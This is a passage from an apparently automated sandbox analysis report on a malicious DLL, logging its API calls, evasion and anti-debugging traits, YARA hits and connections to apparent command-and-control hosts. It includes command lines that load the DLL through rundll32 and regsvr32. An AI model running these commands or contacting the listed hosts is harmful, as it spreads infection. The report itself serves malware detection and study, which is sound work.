                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100024A5 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10001D37 NtMapViewOfSection,
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100024A5 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0540737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05408521 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001D37 NtMapViewOfSection,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100024A5 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B8521 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001D37 NtMapViewOfSection,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100024A5 NtQueryVirtualMemory,
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                Source: cVZ5IwmAMe.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: cVZ5IwmAMe.dllStatic PE information: Section: .reloc ZLIB complexity 1.021484375
                Source: cVZ5IwmAMe.dllReversingLabs: Detection: 45%
                Source: cVZ5IwmAMe.dllVirustotal: Detection: 47%
                Source: cVZ5IwmAMe.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\cVZ5IwmAMe.dll
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cVZ5IwmAMe.dll,DllRegisterServer
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 272
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 276
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\cVZ5IwmAMe.dll
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cVZ5IwmAMe.dll,DllRegisterServer
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER264E.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winDLL@12/8@6/3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05407256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3988:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2820
                Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: cVZ5IwmAMe.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                Source: cVZ5IwmAMe.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D543141 push ss; retf
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002220 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002273 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BD1C94 push 23000002h; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BD0E56 push dword ptr [ebp+ebx*4+03h]; ret
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002220 push ecx; ret
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002273 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05407F00 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0540B859 push 0000006Fh; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054082EB push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002220 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002273 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041BB859 push 0000006Fh; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B82EB push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B7F00 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002220 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002273 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04150E56 push dword ptr [ebp+ebx*4+03h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04151C94 push 23000002h; ret
                Source: cVZ5IwmAMe.dllStatic PE information: section name: .sdfg
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100015BD LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\cVZ5IwmAMe.dll
                Source: initial sampleStatic PE information: section name: .text entropy: 7.128336096292264

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Yara matchFile source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.46b94a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.5400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.41b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.4e194a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.e30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.317d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33aa838.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.265a5b8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.52a94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleep
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6060Thread sleep count: 55 > 30
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5308Thread sleep count: 43 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: regsvr32.exe, 00000003.00000003.371100955.00000000031C9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: regsvr32.exe, 00000003.00000003.371100955.00000000031C9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                Source: C:\Windows\System32\loaddll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                Source: C:\Windows\SysWOW64\regsvr32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100015BD LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00BD3C9D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04153C9D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001726 LdrInitializeThunk,

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.145.183 80
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: onlinetwork.top
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.194 80
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: linetwork.top
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1
                Source: C:\Windows\System32\loaddll32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054054EC cpuid
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001C65 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000204A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054054EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
